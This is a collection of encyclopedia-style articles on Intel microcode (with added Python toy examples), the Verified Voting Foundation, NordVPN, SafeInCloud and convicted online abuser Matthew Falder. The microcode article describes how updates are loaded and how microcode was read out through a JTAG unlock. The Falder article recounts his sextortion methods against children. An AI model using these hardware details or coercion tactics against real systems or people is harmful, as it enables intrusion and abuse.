On the Intel 80486 and AMD Am486 there are approximately 250 lines of microcode, totalling 12,032 bits stored in the microcode ROM. On the Pentium Pro, each micro-operation is 72 bits wide (or, by some accounts, 118 bits). This includes an opcode, two source fields, and one destination field, with the ability to hold a 32-bit immediate value. The Pentium Pro is able to detect parity errors in its internal microcode and report these via the Machine Check Architecture. Micro-operations have a consistent format with up to three source inputs, and two destination outputs. The processor performs register renaming to map these inputs to and from the real register file (RRF) before and after their execution. Out-of-order execution is used, so the micro-operations and the instructions they represent may not execute in the same order. During development of the Pentium Pro, several microcode fixes were included between the A2 and B0 steppings. For the Pentium II (based on the P6 Pentium Pro), additional micro-operations were added to support the MMX instruction set. In several cases, "microcode assists" were added to handle rare corner cases in a reliable way. The Pentium 4 can have 126 micro-operations in flight at the same time.
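The register-renaming step described above — mapping a micro-operation's architectural source and destination registers onto a larger physical register file so that independent operations can execute out of order — can be sketched abstractly. This is a toy model of the general technique, not Intel's actual rename hardware.

```python
def rename(uops, num_phys=40):
    """Map architectural registers to fresh physical registers.

    Each uop is (dest, src1, src2). Every write allocates a new physical
    register, so a later write to eax no longer conflicts with an earlier
    read of eax (write-after-read hazards disappear).
    """
    rat = {}                      # register alias table: arch reg -> phys reg
    free = iter(range(num_phys))
    renamed = []
    for dest, src1, src2 in uops:
        s1 = rat.get(src1, src1)  # reads use the current mapping
        s2 = rat.get(src2, src2)
        p = f"p{next(free)}"      # writes get a fresh physical register
        rat[dest] = p
        renamed.append((p, s1, s2))
    return renamed

# eax is written twice; after renaming the two writes target different
# physical registers and are independent of each other.
print(rename([("eax", "ebx", "ecx"), ("eax", "eax", "edx")]))
# [('p0', 'ebx', 'ecx'), ('p1', 'p0', 'edx')]
```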
Micro-operations are decoded and stored in an Execution Trace Cache with 12,000 entries, to avoid repeated decoding of the same x86 instructions. Groups of six micro-operations are packed into a trace line. Micro-operations can borrow extra immediate data space within the same cache line. Complex instructions, such as exception handling, result in jumping to the microcode ROM. During development of the Pentium 4, microcode accounted for 14% of processor bugs, versus 30% of processor bugs during development of the Pentium Pro. The Intel Core microarchitecture introduced in 2006 added "micro-operations fusion" for some common pairs of instructions, including comparison followed by a jump. The instruction decoders in the Core convert x86 instructions into microcode in three different ways. For Intel's hyper-threading implementation of simultaneous multithreading, the microcode ROM, trace cache, and instruction decoders are shared, but the micro-operation queue is not.

Update facility
In the mid-1990s, a facility for supplying new microcode was initially referred to as the Pentium Pro BIOS Update Feature. It was intended that user-mode applications should make a BIOS interrupt call to supply a new "BIOS Update Data Block", which the BIOS would partially validate and save to nonvolatile BIOS memory; this could be supplied to the installed processors on next boot. Intel distributed a program called BUP_UTIL.EXE, later renamed CHECKUP3.EXE, that could be run under DOS. Collections of multiple microcode updates were concatenated together and numbered sequentially, with the extension .PDB, such as PEP6.PDB.

Processor interface
The processor boots up using a set of microcode held inside the processor and stored in an internal ROM. A microcode update populates a separate SRAM and a set of "match registers" that act as breakpoints within the microcode ROM, allowing jumps to the updated list of micro-operations in the SRAM.
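The match-register mechanism just described — a patched address in the microcode ROM triggers a jump into SRAM — behaves like a small table of breakpoints. The following toy model is purely illustrative (real match registers also carry validity bits and hardware timing constraints):

```python
class MicrocodeSequencer:
    def __init__(self, rom, patch_sram, match_registers):
        self.rom = rom                  # address -> micro-op (read-only)
        self.sram = patch_sram          # address -> patched micro-op
        self.matches = match_registers  # ROM address -> SRAM address

    def fetch(self, uip):
        """Fetch the micro-op at the microcode instruction pointer (UIP).

        If the UIP hits a match register, control transfers to the
        patched routine in SRAM instead of the buggy ROM entry.
        """
        if uip in self.matches:
            return self.sram[self.matches[uip]]
        return self.rom[uip]

seq = MicrocodeSequencer(
    rom={0x10: "buggy_uop", 0x11: "ok_uop"},
    patch_sram={0x0: "fixed_uop"},
    match_registers={0x10: 0x0},  # breakpoint on the buggy ROM address
)
print(seq.fetch(0x10), seq.fetch(0x11))  # fixed_uop ok_uop
```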
A match is performed between the microcode instruction pointer (UIP) and all of the match registers, with any match resulting in a jump to the corresponding destination microcode address. In the original P6 architecture there is space in the SRAM for 60 micro-operations, and multiple match/destination register pairs. It takes one processor instruction cycle to jump from ROM microcode to patched microcode held in SRAM. Match registers consist of a microcode match address and a microcode destination address. The processor must be in protection ring zero in order to initiate a microcode update. Each CPU in a symmetric multiprocessing arrangement needs to be updated individually. An update is initiated by placing its address in the EAX register, setting ECX = 0x79, and executing a wrmsr (write model-specific register) instruction.

Microcode update format
Intel distributes microcode updates as 2,048-byte (2 kilobyte) binary blobs. The update contains information about which processors it is designed for, so that this can be checked against the result of the CPUID instruction. The structure is a 48-byte header, followed by 2,000 bytes intended to be read directly by the processor to be updated:
A microcode program that is executed by the processor during the microcode update process. This microcode is able to reconfigure and enable or disable components using a special register, and it must update the breakpoint match registers.
Up to sixty patched micro-operations to be populated into the SRAM.
Padding consisting of random values, to obfuscate understanding of the format of the microcode update. Each block is encoded differently, and the majority of the 2,000 bytes are not used, as the configuration program and SRAM micro-operation contents themselves are much smaller.
Final determination and validation of whether an update can be applied to a processor is performed during decryption by the processor.
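The 48-byte header at the front of the 2,048-byte blob can be explored with a short parser. The field names below follow Intel's commonly documented update-header layout (header version, update revision, date, processor signature, checksum, loader revision, processor flags, sizes); treat the exact layout as an assumption for illustration rather than a normative definition.

```python
import struct

# Twelve little-endian 32-bit fields = 48 bytes.
HEADER = struct.Struct("<12I")
FIELDS = (
    "header_version", "update_revision", "date", "processor_signature",
    "checksum", "loader_revision", "processor_flags", "data_size",
    "total_size", "reserved0", "reserved1", "reserved2",
)

def parse_header(blob: bytes) -> dict:
    """Parse the 48-byte header at the front of a microcode update blob."""
    return dict(zip(FIELDS, HEADER.unpack(blob[:HEADER.size])))

# A synthetic update: 48-byte header + 2,000 bytes of payload/padding.
fake = HEADER.pack(1, 0xB4, 0x04102018, 0x000506E3, 0, 1, 0x36, 0, 0, 0, 0, 0)
fake += bytes(2000)
hdr = parse_header(fake)
print(len(fake), hex(hdr["processor_signature"]))  # 2048 0x506e3
```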
Each microcode update is specific to a particular CPU revision, and is designed to be rejected by CPUs with a different stepping level. Microcode updates are encrypted to prevent tampering and to enable validation. With the Pentium there are two layers of encryption, and the precise details are not explicitly documented by Intel, instead being known to fewer than ten employees. Microcode updates for Intel Atom, Nehalem and Sandy Bridge additionally contain an extra 520-byte header containing a 2048-bit RSA modulus with a public exponent of 17.

Debugging
Special debugging-specific microcode can be loaded to enable Extended Execution Trace, which then outputs extra information via the Breakpoint Monitor Pins. On the Pentium 4, loading special microcode can give access to Microcode Extended Execution Trace mode. When using the JTAG Test Access Port (TAP), a pair of Breakpoint Control registers allows breaking on microcode addresses.

During the mid-1980s NEC and Intel had a long-running US federal court case about microcode copyright. NEC had been acting as a second source for Intel 8086 CPUs with its NEC μPD8086, and held long-term patent and copyright cross-licensing agreements with Intel. In August 1982 Intel sued NEC for copyright infringement over the microcode implementation. NEC prevailed by demonstrating via cleanroom software engineering that the similarities in the implementation of microcode on its V20 and V30 processors were the result of the restrictions demanded by the architecture, rather than of copying.

The Intel 386 can perform a built-in self-test of the microcode and programmable logic arrays, with the result of the self-test placed in the EAX register. During the BIST, the microprogram counter is re-used to walk through all of the ROMs, with the results being collated via a network of multiple-input signature registers (MISRs) and linear-feedback shift registers.
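Verification with a small RSA public exponent like the 17 mentioned above is cheap: the verifier computes sig^17 mod n and compares the result to the expected (padded) digest. The toy keypair below uses textbook-sized numbers purely to show the arithmetic; real updates use a 2048-bit modulus and proper padding, and the loader-side check is Intel's, not this sketch.

```python
# Textbook RSA with public exponent e = 17 (toy modulus, illustration only).
p, q = 61, 53
n = p * q                            # 3233
e = 17
d = pow(e, -1, (p - 1) * (q - 1))    # private exponent (Python 3.8+)

digest = 65                          # stand-in for a hash of the update body
signature = pow(digest, d, n)        # signer: digest^d mod n

# The verifier (e.g. a CPU's update loader) needs only n and e = 17:
assert pow(signature, e, n) == digest
```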
On start-up of the Intel 486, a hardware-controlled BIST runs for 2^20 clock cycles to check various arrays including the microcode ROM, after which control is transferred to the microcode for further self-testing of registers and computation units. The Intel 486 microcode ROM has 250,000 transistors.

AMD had a long-term contract to reuse Intel's 286, 386 and 486 microcode. In October 2004, a court ruled that the agreement did not cover AMD distributing Intel's 486 in-circuit emulation (ICE) microcode.

Direct Access Testing
Direct Access Testing (DAT) is included in Intel CPUs as part of the design for testing (DFT) and design for debug (DFD) initiatives, allowing full-coverage testing of individual CPUs prior to sale. In May 2020, a script reading directly from the Control Register Bus (CRBUS) (after exploiting "Red Unlock" via JTAG over a USB-A to USB-A 3.0 debugging cable, without D+, D− and Vcc connected) was used to read from the Local Direct Access Test (LDAT) port of the Intel Goldmont CPU, and the loaded microcode and patch arrays were read out. These arrays are only accessible after the CPU has been put into a specific mode, and consist of five arrays accessed through offset 0x6a0.

References

Further reading
"the first in a REP swing operation loads the Loop Counter with the number of iterations remaining after the unrolled iterations are executed. … a small number of iterations (e.g., seven), are sent during the time it takes for the Loop Counter in the MS to be loaded. This unrolled code is executed conditionally based on the value of (E)CX … remaining three iterations are turned into NOPS."
"… control returns to the Micro-operation Sequence (MS) unit to issue further error correction Control micro-operations (Cuops). In order to simplify restart, the Cuops originating from the error-causing macroinstruction supplied by the translate programmable logic arrays (XLAT PLAs) are loaded into the Cuop registers, with their valid bits unasserted."
"ADD, XOR, SUB, AND, and OR, which are implemented with one generic Cuop. Another group of instructions representable by only one includes and "SYSENTER and SYSEXIT are assembly-language instructions that may be executed on an Intel architecture processor, such as the Pentium Pro processor … micro-operation is determined to be ready when its source fields have been filled with appropriate data … instruction decode unit comprises one or more translate (XLAT) programmable logic arrays (PLAs) that decode each instruction in to one or more micro-operations. … SYSENTER and SYSEXIT instructions are decoded in to micro-operations that perform the steps illustrated in FIGS. 5 and 6, respectively." External links uCodeDisasm — Intel microcode disassembler in Python (from CRBUS), names of uops Microcode, Intel Microcode, Intel
https://en.wikipedia.org/wiki/Verified%20Voting%20Foundation
Verified Voting Foundation
The Verified Voting Foundation is a non-governmental, nonpartisan organization founded in 2004 by David L. Dill, a computer scientist from Stanford University, focused on how technology impacts the administration of US elections. The organization’s mission is to “strengthen democracy for all voters by promoting the responsible use of technology in elections.” Verified Voting works with election officials, elected leaders, and other policymakers who are responsible for managing local and state election systems to mitigate the risks associated with novel voting technologies.

History
Foundation
David L. Dill's research involves "circuit verification and synthesis and in verification methods for hard real-time systems". Part of this work has required him to testify on "electronic voting before the U.S. Senate and the Commission on Federal Election Reform". These interests ultimately led him to establish the Verified Voting Foundation in 2003.

Activities
Partnerships and lobbying efforts
Verified Voting partners with an array of organizations and coalitions to help coordinate post-election audits, tabletop exercises, and election protection work on a state and local level. The organization works closely with the Brennan Center for Justice and Common Cause; in 2020 the organizations advocated together for election best practices, such as paper ballots and adequate election security funding, in key swing states. Verified Voting also co-chaired the Election Protection Election Security Working Group during the 2020 election cycle, helping to monitor and respond to state-specific election security issues. Verified Voting participates in several coalitions, including the Secure Our Vote Coalition and the National Task Force on Election Crises. Secure Our Vote helped to successfully block legislation permitting internet voting in Puerto Rico (see below for Verified Voting’s stance on internet voting).
Verified Voting’s work with the National Task Force on Election Crises supported the Task Force’s mission to develop responses to potential election crises in 2020 and guarantee a peaceful transfer of power. Verified Voting also coordinates with its partners to advocate to both federal and state governments for election security. The Foundation conducts this lobbying work as part of its 501(c)(4) arm. At the federal level, the organization meets with lawmakers, sends letters, and issues statements to support “federal election security provisions that provide states and local jurisdictions with the funding and assistance they need to implement best practices like paper ballots and RLAs.” The organization also advocates in specific states, employing a “targeted approach” that seeks to address the specific election security and voter integrity issues facing a particular state. In 2020, for instance, the organization worked in Virginia to increase safe voting options amidst the pandemic, successfully advocated against internet voting legislation in New Jersey, and provided advice on RLA regulation to officials in California and Oregon.

The Verifier Tool
Since 2004, Verified Voting has been collecting data on the nation’s voting machines and making it available through a web-based interactive tool called “the Verifier.” The Verifier is the most comprehensive publicly available set of data related to voting equipment usage in the United States. For each federal election cycle, the Verifier documents the specific voting equipment in use in every jurisdiction across the country. The Verifier is used by election officials, academics, organizations, the news media, and the general public as a source of information about voting technology. Since its inception, the Verifier has supported a number of initiatives including national election protection operations, state advocacy, policy making, reporting, and congressional research inquiries.
To maintain the database, Verified Voting liaises with election officials, monitors local news stories, and researches certification documents. The Verifier is a critical aspect of Verified Voting's organizational infrastructure and supports the responsible use of technology in elections.

Stances
Stance on paper ballots
Verified Voting advocates for the use of voter-verified paper ballots that “create tangible and auditable records of votes cast in an election.” Paper trails generated by voter-verified paper ballots “provide a reliable way to check that the computers were not compromised (whether through human error or malfeasance),” an important point given that 99% of all ballots cast in the United States are counted by a computer. Verified Voting advises state and local jurisdictions to help them “implement best practices for election security.” The organization advocates that election officials avoid using electronic voting systems which do not provide a paper trail. Verified Voting plays a leading role in providing states and localities with the information, expertise, and advice needed to make informed decisions about the voting equipment they use and purchase. In 2019 and 2020, the organization offered feedback on the adoption of new voting machines in California, New York, Florida, North Carolina, and Pennsylvania, as well as other states, advocating in all instances for the use of voter-verified paper ballots.

Stance on internet voting
Verified Voting works to highlight the risks of online voting and recommends that state and local governments avoid adopting these technologies. The organization argues that elections held online would be “easy targets for attackers.” Online voting, which includes voting on a mobile app, lacks the capacity to generate a voter-verified paper record and cannot protect a voter’s privacy or the integrity of their ballot.
Verified Voting notes that, unlike with other online services, election manipulation is difficult to catch because ballot secrecy prevents voters from seeing their ballots after they have been submitted, which also prevents voters from determining whether their votes have been digitally altered. A 2016 report co-authored by the organization concluded that “as states permit the marking and transmitting of marked ballots over the Internet, the right to a secret ballot is eroded and the integrity of our elections is put at risk.” The organization notes that with mobile voting, there is no way to determine the security of “the actual device that voters cast their votes on...The voter’s device may already be corrupted with malware or viruses that could interfere with ballot transmission or even spread that malware to the computer at the elections office on the receiving end of the online ballot.” Online voting systems that rely on blockchain technology face a similar challenge: Verified Voting argues that while “blockchain technology is designed to keep information secure once it is received,” such technology “cannot defend against the multitude of threats to that information before it is entered in the blockchain.” Moreover, blockchain technology prevents voters from anonymously verifying their ballot, and presents risks to “ballot secrecy if encryption keys are not properly protected or software errors allow decryption of individual ballots.”

Post-Election Audits and Risk-Limiting Audits
Verified Voting advises state and local governments to pilot and implement post-election audits and risk-limiting audits (RLAs). Post-election tabulation audits routinely check voting system performance. These audits are designed to check the accuracy of a particular tabulation, not the overall results of an election.
Risk-limiting audits, meanwhile, “provide reason to trust that the final outcome matches the ballots.” RLAs accomplish this by checking a “random sample of voter-verifiable paper ballots, seeking evidence that the reported election outcome was correct, if it was.” In this context, the 'correct' outcome is what a full hand count of the ballots would reveal. Since RLAs continue checking random samples until there is convincing evidence that the outcome is correct, “contests with wide margins can be audited with very few ballots, freeing up resources for auditing closer contests, which generally require checking more ballots.” RLAs can also trigger full hand recounts if the audit results do not support the reported election outcome. In order to facilitate the implementation of RLAs, Verified Voting designs pilot audits and post-election audits in conjunction with specific state and local governments, and has conducted studies in Rhode Island, Orange County (CA), and Fairfax (VA). These studies have helped lead to the implementation of RLAs and audit legislation in several states. The organization advocates for robust post-election audits and also maintains an online, publicly accessible database of all state election audit laws.
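The sequential logic described above — keep sampling ballots until the evidence for the reported winner is strong enough, stopping early in wide-margin contests — is the idea behind ballot-polling RLAs such as BRAVO. The following simplified two-candidate sketch is for illustration; real procedures handle multiple contests, ties, and escalation to a full hand count.

```python
def ballot_polling_audit(ballots, reported_winner_share, risk_limit=0.05):
    """Sequentially test whether the reported winner really won.

    Wald-style likelihood ratio: each sampled ballot for the winner
    multiplies the evidence by 2p, each other ballot by 2(1-p). The
    audit stops as soon as the ratio reaches 1/risk_limit.
    """
    p = reported_winner_share           # reported share, must be > 0.5
    ratio, examined = 1.0, 0
    for ballot_for_winner in ballots:
        examined += 1
        ratio *= 2 * p if ballot_for_winner else 2 * (1 - p)
        if ratio >= 1 / risk_limit:
            return True, examined       # outcome confirmed
    return False, examined              # escalate (e.g. full hand count)

# A 70/30 contest: a short run of winner ballots is already convincing.
confirmed, n = ballot_polling_audit([True] * 20, 0.7)
print(confirmed, n)  # True 9
```

Note how the stopping rule makes wide margins cheap to audit: at a 70% reported share, nine consecutive winner ballots already push the ratio past 1/0.05 = 20.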
https://en.wikipedia.org/wiki/NordVPN
NordVPN
NordVPN is a VPN service with applications for Windows, macOS, Linux, Android, iOS, and Android TV. Manual setup is available for wireless routers, NAS devices and other platforms. NordVPN is developed by Nord Security, a company that creates cybersecurity software and was initially supported by the Lithuanian startup accelerator and business incubator Tesonet. NordVPN operates under the jurisdiction of Panama, as the country has no mandatory data retention laws and does not participate in the Five Eyes or Fourteen Eyes intelligence-sharing alliances. Its offices are located in Lithuania, the United Kingdom, Panama and the Netherlands.

History
NordVPN was established in 2012 by a group of childhood friends who included Tom Okman. Late in May 2016, it presented an Android app, followed by an iOS app in June the same year. In October 2017, it launched a browser extension for Google Chrome. In June 2018, the service launched an application for Android TV. As of June 2021, NordVPN was operating 5,600 servers in 59 countries.

In March 2019, it was reported that NordVPN received a directive from Russian authorities to join a state-sponsored registry of banned websites, which would prevent Russian NordVPN users from circumventing state censorship. NordVPN was reportedly given one month to comply, or face blocking by Russian authorities. The provider declined to comply with the request and shut down its Russian servers on April 1. As a result, NordVPN still operates in Russia, but its Russian users have no access to local servers.

In September 2019, NordVPN announced NordVPN Teams, a VPN solution aimed at small and medium businesses, remote teams and freelancers who need secure access to work resources. Two years later, NordVPN Teams was rebranded as NordLayer and moved towards SASE business solutions. Press sources cited the market rise of SASE technology as one of the key factors in the rebrand.
On October 29, 2019, NordVPN announced additional audits and a public bug bounty program. The bug bounty was launched in December 2019, offering researchers monetary rewards for reporting critical flaws in the service. In December 2019, NordVPN became one of the five founding members of the newly formed 'VPN Trust Initiative', promising to promote online security as well as more self-regulation and transparency in the industry. In 2020, the initiative announced 5 key areas of focus: security, privacy, advertising practices, disclosure and transparency, and social responsibility. In August 2020, Troy Hunt, an Australian web security expert and founder of Have I Been Pwned?, announced a partnership with NordVPN as a strategic advisor. On his blog, Hunt described this role as "work with NordVPN on their tools and messaging with a view to helping them make a great product even better." In October 2020, NordVPN started rolling out its first colocated servers in Finland to secure the hardware perimeter. The RAM-based servers are fully owned and operated by NordVPN in an attempt to keep full control. Technology NordVPN routes all users' internet traffic through a remote server run by the service, thereby hiding their IP address and encrypting all incoming and outgoing data. For encryption, NordVPN has been using the OpenVPN and Internet Key Exchange v2/IPsec technologies in its applications and also introduced its proprietary NordLynx technology in 2019. NordLynx is a VPN tool based on the WireGuard protocol, which aims for better performance than the IPsec and OpenVPN tunneling protocols. According to tests performed by Wired UK, NordLynx produces "speed boosts of hundreds of MB/s under some conditions." In April 2020, NordVPN announced a gradual roll-out of the WireGuard-based NordLynx protocol on all its platforms. 
The wider implementation was preceded by a total of 256,886 tests, which included 47 virtual machines on nine different providers, in 19 cities and eight countries. The tests showed higher average download and upload speeds than both OpenVPN and IKEv2. At one time NordVPN also offered L2TP/IPsec and Point-to-Point Tunneling Protocol (PPTP) connections for routers, but these were later removed, as they were largely outdated and insecure.

NordVPN has desktop applications for Windows, macOS, and Linux, as well as mobile apps for Android and iOS and an Android TV app. Subscribers also get access to encrypted proxy extensions for the Chrome and Firefox browsers. Subscribers can connect up to six devices simultaneously.

In November 2018, NordVPN claimed that its no-log policy was verified through an audit by PricewaterhouseCoopers AG. In 2020, NordVPN underwent a second security audit by PricewaterhouseCoopers AG. The testing focused on NordVPN’s Standard VPN, Double VPN, Obfuscated (XOR) VPN, P2P servers, and the product’s central infrastructure. The audit confirmed that the company’s privacy policy was upheld and that the no-logging policy again held true. In 2021, NordVPN completed an application security audit carried out by the security research group VerSprite. VerSprite performed penetration testing and, according to the company, found no critical vulnerabilities. One flaw and a few bugs that were found in the audit have since been patched.

In December 2020, NordVPN started a network-wide rollout of 10 Gbit/s servers, upgrading from the earlier 1 Gbit/s standard. The company's servers in Amsterdam and Tokyo were the first to support 10 Gbit/s, and by December 21, 2020, over 20% of the company's network had been upgraded. In January 2022, NordVPN released an open-source VPN speed testing tool, available for download from GitHub.
Additional features
Besides general-use VPN servers, the provider offers servers for specific purposes, including P2P sharing, double encryption, and connection to the Tor anonymity network. NordVPN offers three subscription plans: monthly, yearly and bi-yearly. NordVPN also develops CyberSec for the Windows, macOS, and Linux platforms, a security feature that works as an ad-blocker and also automatically blocks websites known for hosting malware. In November 2020, NordVPN launched a feature that scans the dark web to determine if a user's personal credentials have been exposed. When the Dark Web Monitor feature finds any leaked credentials, it sends a real-time alert, prompting the user to change the affected passwords.

Research
In 2021, NordVPN conducted a study on digital literacy, surveying 48,063 respondents from 192 countries on their digital habits and rating their knowledge on a scale from 1 to 100. Germany topped the list, followed by the Netherlands and Switzerland. The overall global score was 65.2/100. In July 2021, NordVPN released a report outlining the proliferation of smart devices and consumer sentiment regarding their security. The poll of 7,000 people revealed that while 95% of people in the UK had some kind of IoT device in their household, almost a fifth took no measures to protect them. Similar responses were found among respondents from other countries as well. The same year, NordVPN released a report about device sharing in the workplace. The study found that managers are five times more likely to share their work devices than their employees. NordVPN also conducted a study on the time people spend online. In a survey of 2,000 adults in the UK, NordVPN found that, on average, British people spend 59 hours online per week, which amounts to 22 years over a lifetime.

Social responsibility
NordVPN has supported various social causes, including cybercrime prevention, education, internet freedom, and digital rights.
NordVPN offers emergency VPN services for activists and journalists in regimes that censor internet freedom. In 2020, NordVPN reported having donated over 470 emergency VPN accounts to citizens and NGOs from Hong Kong and given out an additional 1,150 VPN licenses to various organizations. In 2020, NordVPN supported the Internet Freedom Festival, a project promoting digital human rights and internet freedom. NordVPN also sponsors the Cybercrime Support Network, a non-profit organization that assists people and companies affected by cybercrime. In response to the COVID-19 pandemic, NordVPN's parent company Nord Security offered free online security tools (NordVPN, NordPass, and NordLocker) to affected nonprofit organizations, content creators, and educators. In 2021, NordVPN proposed International VPN Day, a day to bring attention to people's right to digital privacy, security, and freedom, proposed to be observed annually on August 19. Its primary goal is to raise awareness of cybersecurity best practices and to educate internet users about the importance of online privacy tools and cybersecurity in general. Reception In a positive review published by Tom's Guide in October 2019, the reviewer concluded that "NordVPN is affordable and offers all the features that even the hardcore VPN elitists will find suitable". The reviewer also noted that its terms of service mention no country of jurisdiction, writing that the company could be more transparent about its ownership. In a February 2019 review by PC Magazine, NordVPN was praised for its strong security features and an "enormous network of servers", although its price tag was noted as expensive. In a later review by the same magazine, NordVPN was again praised for extra features rarely found in other VPNs, its WireGuard-based protocol, large selection of servers, and strong security practices. Despite winning the outlet's Editor's Choice award, NordVPN was still noted as expensive.
CNET's September 2021 review favorably noted NordVPN's SmartPlay feature, obfuscated servers, and security efforts. While CNET praised NordVPN’s user-friendly interface, it noted that the map’s design could be improved. TechRadar recommended NordVPN for its security and recent enhancements. It also noted that NordVPN worked well in countries with Internet censorship, including the Great Firewall in China. In 2021, a favorable review by Wired noted that NordVPN’s price has become more affordable and concluded that “NordVPN is the fastest jack-of-all-trades VPN provider right now.” However, the article also noted that there are still cheaper VPN options available. Awards In 2019, NordVPN won the ‘Best Overall’ category in ProPrivacy.com VPN Awards. In 2020, NordVPN won in German CHIP magazine’s ‘Best security of the VPN services’ category. In September 2021, NordVPN won CNET’s ‘Best VPN for reliability and security’ award in its annual ‘Best VPN service’ awards. Criticism On October 21, 2019, a security researcher disclosed on Twitter a server breach of NordVPN involving a leaked private key. The cyberattack granted the attackers root access, which was used to generate an HTTPS certificate that enabled the attackers to perform man-in-the-middle attacks to intercept the communications of NordVPN users. In response, NordVPN confirmed that one of its servers based in Finland was breached in March 2018, but there was no evidence of an actual man-in-the-middle attack ever taking place. The exploit was the result of a vulnerability in a contracted data center's remote administration system that affected the Finland server between January 31 and March 20, 2018. According to NordVPN, the data center disclosed the breach to NordVPN on April 13, 2019, and NordVPN ended its relationship with the data center. Security researchers and media outlets criticized NordVPN for failing to promptly disclose the breach after the company became aware of it. 
NordVPN stated that the company initially planned to disclose the breach after it completed the audit of its 5,000 servers for any similar risks. On November 1, 2019, in a separate incident, it was reported that approximately 2,000 usernames and passwords of NordVPN accounts were exposed through credential stuffing. See also Comparison of virtual private network services Encryption Internet freedom in Panama Internet privacy Secure communication References External links Virtual private network services Internet security Internet privacy Internet privacy software Internet properties established in 2012 Telecommunications companies of Panama YouTube sponsors
56481093
https://en.wikipedia.org/wiki/SafeInCloud
SafeInCloud
SafeInCloud is a proprietary password manager that securely stores passwords and other credentials offline and in the cloud. It is similar to Enpass, offering much the same functionality. Features One master password Everything is encrypted locally Cloud synchronization to Google Drive, Dropbox, OneDrive and WebDAV Cross-browser and cross-platform support Strong password generation Password encryption AutoFill of passwords with the help of browser extensions Portable access See also Comparison of password managers References External links Software that uses Qt Password managers Cross-platform software IOS software Android (operating system) software Universal Windows Platform apps MacOS software
56608341
https://en.wikipedia.org/wiki/Matthew%20Falder
Matthew Falder
Matthew Alexander Falder (born 24 October 1988) is a convicted English serial sex offender and blackmailer who coerced his victims online into sending him degrading images of themselves or into committing crimes against a third person, such as rape or assault. He managed this by threatening to send his victims' family or friends degrading information or revealing pictures of them (which he usually obtained earlier by gaining the victim's trust under false pretences) if they did not comply with his commands. Falder hid behind anonymous accounts on the web and then re-posted the images to gain a higher status on the dark web. Investigators said that he "revelled" in getting images to share on hurtcore websites. The National Crime Agency (NCA) described him as "one of the most prolific and depraved offenders they had ever encountered." Falder pleaded guilty to 137 charges from 46 complainants, making him one of the UK's most prolific convicted sex offenders. In February 2018 he was jailed for 32 years and ordered to serve a further six years on extended licence. The Court of Appeal later reduced the term of imprisonment to 25 years, with an extended licence of 8 years. Early life and career Falder grew up in Knutsford, Cheshire. He attended The King's School in Macclesfield, Cheshire, where it was reported that he had "excelled". After school he attended Clare College of the University of Cambridge, specialising in seismic oceanography and earning master's and doctoral degrees. At the time of his arrest, he was working as a post-doctoral researcher and lecturer in geophysics at the University of Birmingham. Falder was well-liked in his peer group, and was described as being extroverted, funny and larger than life. Sexual offences Falder's offending was detected as long ago as 2009. He did not meet any of his victims; all of his crimes were committed using the dark web.
Falder manipulated young children to photograph themselves in compromising positions and then offered the images online. In April 2015, the NCA discovered someone posting to the hurtcore websites under the name "666devil", who later turned out to be Falder. NCA officers arrested Falder in his office at his place of work on 21 June 2017. When they read out a list of the offences he was suspected of committing, Falder remarked that it sounded "like the rap sheet from hell". Falder's victims numbered over 50, and it took over 30 minutes to read out the charges to him at Birmingham Crown Court. Originally charged with 188 offences, he pleaded not guilty to 51 of them; the prosecution accepted these pleas, and the charges were ordered to remain on file. Falder used various accounts on several websites to pose as a young girl or woman named 'Liz'. On the dark web Falder used names such as 'inthegarden', '666devil' and 'evilmind'. Falder had seventy different online identities. He lured people into taking photographs of themselves in humiliating situations. He blackmailed one person into raping a four-year-old child. Falder engaged in hurtcore, which police have characterised as manipulating others into performing acts of "rape, murder, sadism, torture, paedophilia, blackmail, humiliation and degradation". One of Falder's victims was just 14 years old; Falder said online he would willingly "mentally fuck her up" and added, "I am not sure I care if she lives or dies." Falder increased the pressure on his victims, at least four of whom attempted suicide. When one of his victims pleaded for the abuse to end, saying they would otherwise kill themselves, Falder replied that the images he already had of them would be circulated on the Internet anyway. Falder maintained he could not be caught and said he did not care if the victims lived or died.
In addition to the National Crime Agency (NCA), the investigation to uncover his identity involved GCHQ, US Homeland Security, Europol, the Australian Federal Police, New Zealand Police, and the Israel Police; it lasted four years. Will Kerr of the NCA felt that tech companies' cooperation with the police during the enquiry was less than ideal, maintaining that accounts were closed down in ways that may have prevented police from identifying other victims and patterns of offending. Fearing that this may have delayed the identification of offenders, he called for government action to make tech companies cooperate better in future. The NCA detailed crimes such as blackmailing people into eating faeces, licking toilet seats and tampons, and persuading people to eat dog food. They described him as "one of the most prolific and depraved offenders they had ever encountered". On 16 October 2017, Falder pleaded guilty to 137 offences against 46 victims, making him one of the most prolific sex offenders in British history. At Birmingham Crown Court on 19 February 2018, Judge Philip Parker sentenced Falder to 32 years in prison, and ordered him to serve a further 6 years on extended licence after his release. Falder will not be eligible for parole until he is at least 50 years old. If the Parole Board believes that Falder continues to pose a danger to the public or to children, he may have to serve the full 32 years in prison. The judge at the sentencing hearing described Falder as an "internet highwayman" who was "warped and sadistic" and whose behaviour was "cunning, persistent, manipulative and cruel." After sentencing, investigators released footage of his arrest and described how Falder "revelled" in the anguish and pain that he had caused. Ruona Iguyovwe, of the CPS, said, "Matthew Falder is a highly manipulative individual who clearly enjoyed humiliating his many victims and the impact of his offending in this case has been significant. He deliberately targeted young and vulnerable victims.
At least three victims are known to have attempted suicide and some others have inflicted self-harm. There was a high degree of sophistication and significant planning by Falder due to his use of encryption software and technology in his electronic communication and the use of multiple fake online identities and encrypted email addresses.” Prosecutors stated Falder lived a double life, a graduate of Cambridge University and Birmingham University researcher during the day and a sexual predator at night. Police officer Matt Sutton said, ‘In more than 30 years of law enforcement I’ve never come across an offender whose sole motivation was to inflict such profound anguish and pain. Matthew Falder revelled in it. I’ve also never known such an extremely complex investigation with an offender who was technologically savvy and able to stay hidden in the darkest recesses of the dark web. This investigation represents a watershed moment. Falder is not alone so we will continue to develop and deliver our capabilities nationally for the whole law enforcement system to stop offenders like him from wrecking innocent lives. I commend the victims for their bravery and I urge anyone who is being abused online to report it. There is help available.’ Javed Khan of Barnardo's stated, "This [32-year prison] sentence sends a message to paedophiles that they will pay for their crimes while, hopefully giving other child abuse victims the confidence to come forward and seek justice. (...) Barnardo’s wants to encourage parents to talk to their children about the potential dangers online and know what new apps they’re using and which websites they’re visiting, so they can help keep them safe. Barnardo’s also wants tech companies to sign up to an online code of practice to protect children, incorporate safety features when designing products and take action as soon as abuse becomes flagged. 
